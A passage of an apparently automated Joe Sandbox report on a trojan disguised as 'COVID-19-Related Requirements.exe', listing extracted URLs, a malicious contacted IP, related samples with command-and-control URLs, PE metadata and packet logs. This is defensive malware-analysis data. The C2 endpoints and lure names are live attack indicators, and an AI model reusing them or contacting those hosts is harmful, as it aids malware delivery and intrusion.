http://www.fontbureau.com/designers/? | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.imgur.com/oauth2/authorize?client_id= | COVID-19-Related Requirements.exe | false | | high
http://www.fontbureau.com/designers | explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.commQ | COVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.comcom | COVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.imgur.com/oauth2/token | COVID-19-Related Requirements.exe | false | | high
http://www.galapagosdesign.com/DPlease | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.portablesteamsaunas.com/ | wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.imgur.com/3/image/ | COVID-19-Related Requirements.exe | false | | high

                                        Contacted IPs


                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.portablesteamsaunas.com | United States | 16509 | AMAZON-02US | true

                                        General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 425178
Start date: 26.05.2021
Start time: 19:57:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 41s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: COVID-19-Related Requirements.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@11/1@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 22.1% (good quality ratio 20.1%)
• Quality average: 74.2%
• Quality standard deviation: 31.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 92.122.145.220, 104.43.193.48, 20.82.210.154, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 92.122.144.200, 20.50.102.62
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report creation exceeded the maximum time; disassembly code information may be missing.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

Match | Associated Sample Name / URL | Detection | Context
52.58.78.16 | N20210526.exe | malicious | www.fortwayneduiattorney.com/cca/?nRYXM4=DQkKoy4PFhxvpfy0yA/zfG9zgCj3jVN+xnbFtEbC29HfrQWL+0F/38DF1Au9lzaxthz4&D8OLc=wh38e8H0rf
52.58.78.16 | Po_23456.pdf.exe | malicious | www.diamondpolishingtools.com/gad0/?V4=inHXLVZPo&wPN=v3qsT70juIFjFhXaN1zc5giFJQsg+jwtwalemn0+QVkKIDmC7h+wc477+cDBqmBfEGWj
52.58.78.16 | DHL4198278Err-PDF.exe | malicious | www.whizbets.com/ubqx/?VR-T5=lhf8xpGpMnD8mnA&XR-xe0lh=qbpbcgrgrphYC+6vw+rR3rVPLZfPDXctKQyllVhhIijJLSCUP09c2csQ37Z/zesXfed47+3oQw==
52.58.78.16 | RFQ_BRAT_METAL_TECH_LTD.exe | malicious | www.vaginalmedicine.com/m3rc/?5jR=t8ELujbh7xT0&mTftc2P=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTcwtZfJNq3E7cX5npg==
52.58.78.16 | SWIFT_EU.EXE | malicious | www.transferpricingautomation.com/pb93/?tXUh=NqHMizgA0l6RZn3X1T24NTnxDB/y4DGGbp92gRT3DZeqJp8ZQfN9sULjdASqL4q0TkYP&DTs4a=ctxDHdNX
52.58.78.16 | Contract 2021080378818.xlsx | malicious | www.newmopeds.com/p2io/?flyt8dLp=bSK1RxPMHjVQe9mhMJ2LeA3okZHmhG3V4GBmTatllgIVkFsFULHDN3EeY50sHAiR0AoDRA==&QZJxKZ=Zvs8QD08M2oD
52.58.78.16 | Ohki Blower Skid Base Enquiry 052521.exe | malicious | www.seatedmeals.com/un8c/?vR=Ltxx&5j9=colWh+DuPEm5JCAtLfAoITi+6qtCabRxw+nOyJQemXYkKvsa29PMV3JN11EPgH6ZGo/2
52.58.78.16 | fbfcbf13_by_Libranalysis.exe | malicious | www.transferpricingautomation.com/pb93/?oj2DZX=NqHMizgA0l6RZn3X1T24NTnxDB/y4DGGbp92gRT3DZeqJp8ZQfN9sULjdDy6EZ6MNBxI&ET8l=0pW8ZruPWD1HJLm0
52.58.78.16 | SWIFT jpg.exe | malicious | www.justswap.exchange/nvj9/?w2=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN5MdM72+c2+4&BX=7nEt_PI
52.58.78.16 | porosi e re Fature Proforma.exe | malicious | www.viltais.com/nt8e/?v2Mp4=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJMa7ZMKbETQi&jJBP5D=-ZpPy
52.58.78.16 | b9f9ceb8_by_Libranalysis.exe | malicious | www.justswap.exchange/nvj9/?RTE=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN5MdM72+c2+4&3f=Yl9ts0nH4VD
52.58.78.16 | bd729c36_by_Libranalysis.exe | malicious | www.viltais.com/nt8e/?vZR=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJP2SaM2jNwl04iDf7w==&W6=GtSP
52.58.78.16 | 2UPdDxaAmt.exe | malicious | www.newmopeds.com/p2io/?s0=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbcY6DQmi/D1z&CN9=7nH8PLV
52.58.78.16 | Quotation.exe | malicious | www.rafbar.com/u8nw/?Jt7=XPIXpRuH&GFNl=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ4Rbcnj4tA2LprXag==
52.58.78.16 | Ydomibnfzakfagtujeyntncjklfpfrinlj_Signed_.exe | malicious | www.clinics.life/qku9/?IN9d=wPjLqqQ4Fl5oGjCEKguj45taGc7fhq386dHHgSG17iY4BIOMpTzTtH7Yrt6PJ8P24DEX&gP=i4sxnJKX8dtd9Pgp
52.58.78.16 | PO.exe | malicious | www.rafbar.com/u8nw/?YrCLWRfh=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ0oX9Ljvrcn&Dzut_N=3f-4
52.58.78.16 | Shipment of your goods.exe | malicious | www.sanacolitademarijuana.com/u8nw/?1bg=GRA4xl5P9bMxjT&ohuXP=9bHYKsyT0auyBBl4ZenxQUebR4YwlP18dAkCPCATYDDxMs1xZZCxfJgyFNCzTUiCnFtm
52.58.78.16 | proforma invoice.exe | malicious | www.winnipegwebdesigners.com/3edq/?h0DlqTn=j6hslNEQJPAVvjaOLLEjXAx9dXQUFsZcczIoxk2Yy06r67OJvuHcSxzhVKPXou/JjSZC&uZiT=NXEP9
52.58.78.16 | 92bd9987_by_Libranalysis.exe | malicious | www.aideliveryrobot.com/p2io/?Ulm=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCXeRXe31/VGONAQ+A==&SVg84P=yjR8DXLxiJb
52.58.78.16 | e759c6e8_by_Libranalysis.exe | malicious | www.aideliveryrobot.com/p2io/?rVLp5Z=S0GhCH_&RPx=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ

                                        Domains

                                        No context

                                        ASN

                                        Match | Associated Sample Name / URL | Detection | Context
                                        AMAZON-02 (US) | 36157BCD02A5C23A3D161CEF0E3AACC07C73E91E0A98C.exe | malicious
                                        • 3.14.182.203
                                        2uvK1XSXZf.dll | malicious
                                        • 13.225.75.73
                                        6A4s59D7KF.dll | malicious
                                        • 13.225.75.73
                                        N20210526.exe | malicious
                                        • 52.58.78.16
                                        Po_23456.pdf.exe | malicious
                                        • 52.58.78.16
                                        Qgc2Nreer3.exe | malicious
                                        • 13.224.195.25
                                        Pdf Scen Invoice 17INV06003.exe | malicious
                                        • 13.248.216.40
                                        DHL4198278Err-PDF.exe | malicious
                                        • 99.83.154.118
                                        RFQ_BRAT_METAL_TECH_LTD.exe | malicious
                                        • 52.58.78.16
                                        MkV1zeHKw7.exe | malicious
                                        • 13.59.53.244
                                        SWIFT_EU.EXE | malicious
                                        • 52.58.78.16
                                        henry.exe | malicious
                                        • 75.2.73.220
                                        Perpetual.html | malicious
                                        • 143.204.9.105
                                        Agreement_052521.html | malicious
                                        • 52.218.185.241
                                        Descripciones de oferta de productos MACIILIAS SRL doc.exe | malicious
                                        • 3.143.65.214
                                        POSWM240521.exe | malicious
                                        • 18.130.194.62
                                        Contract 2021080378818.xlsx | malicious
                                        • 54.254.146.151
                                        62793461217570C728ED7673B4BBFD7BB54BE067CDB61.exe | malicious
                                        • 3.138.45.170
                                        FiYBg9R8m0.exe | malicious
                                        • 3.129.187.220
                                        Ohki Blower Skid Base Enquiry 052521.exe | malicious
                                        • 52.58.78.16

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COVID-19-Related Requirements.exe.log
                                        Process:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.940725034452451
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:COVID-19-Related Requirements.exe
                                        File size:462336
                                        MD5:7efd588df5d918372c111708f02cc3ce
                                        SHA1:de98b083ed7e8b78be25cacf0715d15dd04228f5
                                        SHA256:de0011128191babcbdb339d2ab7f9568e0b12c5ebc00a99c235fea849885b6a1
                                        SHA512:3524900a08f222c1ab8a70508b53fd87f2dcf01b69b97273456a545ca2a4604afbf4371012ea7f46fba815a1ad7e046a94b3a9b8c4b13676a5419a4178bf47a8
                                        SSDEEP:12288:kn2Byh3FxTBNbrLsosmso27j5vVZhlmcoahAtED:kni83XPLNsmsow5vVflevtE
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.`..............0.............Z#... ...@....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x47235a
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60AE4FA6 [Wed May 26 13:39:50 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        inc ecx
                                        dec esi
                                        inc esp
                                        push edx
                                        dec edi
                                        dec ecx
                                        inc esp
                                        and dword ptr [eax], eax
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72308 | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74000 | 0x5dc | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x76000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0x70368 | 0x70400 | False | 0.950884778675 | data | 7.94983598919 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0x74000 | 0x5dc | 0x600 | False | 0.439453125 | data | 4.22075312592 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x76000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_VERSION | 0x74090 | 0x34c | data | |
                                        RT_MANIFEST | 0x743ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                        Imports

                                        DLL | Import
                                        mscoree.dll | _CorExeMain

                                        Version Infos

                                        Description | Data
                                        Translation | 0x0000 0x04b0
                                        LegalCopyright | Copyright 2013 - 2021
                                        Assembly Version | 1.0.4.0
                                        InternalName | Co2vKXXLQkGY.exe
                                        FileVersion | 1.0.4
                                        CompanyName |
                                        LegalTrademarks |
                                        Comments |
                                        ProductName | Rebooting Image
                                        ProductVersion | 1.0.4
                                        FileDescription | Rebooting Image
                                        OriginalFilename | Co2vKXXLQkGY.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        May 26, 2021 20:00:30.561769009 CEST | 49748 | 80 | 192.168.2.6 | 52.58.78.16
                                        May 26, 2021 20:00:30.605720043 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.6
                                        May 26, 2021 20:00:30.605825901 CEST | 49748 | 80 | 192.168.2.6 | 52.58.78.16
                                        May 26, 2021 20:00:30.606018066 CEST | 49748 | 80 | 192.168.2.6 | 52.58.78.16
                                        May 26, 2021 20:00:30.647995949 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.6
                                        May 26, 2021 20:00:30.648032904 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.6
                                        May 26, 2021 20:00:30.648051023 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.6
                                        May 26, 2021 20:00:30.648365974 CEST | 49748 | 80 | 192.168.2.6 | 52.58.78.16
                                        May 26, 2021 20:00:30.648566961 CEST | 49748 | 80 | 192.168.2.6 | 52.58.78.16
                                        May 26, 2021 20:00:30.690713882 CEST | 80 | 49748 | 52.58.78.16 | 192.168.2.6

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        May 26, 2021 19:58:25.012042046 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:25.061579943 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:25.777455091 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:25.828602076 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:26.096816063 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:26.168008089 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:26.549149990 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:26.602003098 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:27.362481117 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:27.412054062 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:28.206619024 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:28.259442091 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:29.237461090 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:29.292586088 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:30.378185034 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:30.431212902 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:31.327795029 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:31.377475023 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:32.215584993 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
                                        May 26, 2021 19:58:32.265959024 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
                                        May 26, 2021 19:58:33.039597034 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
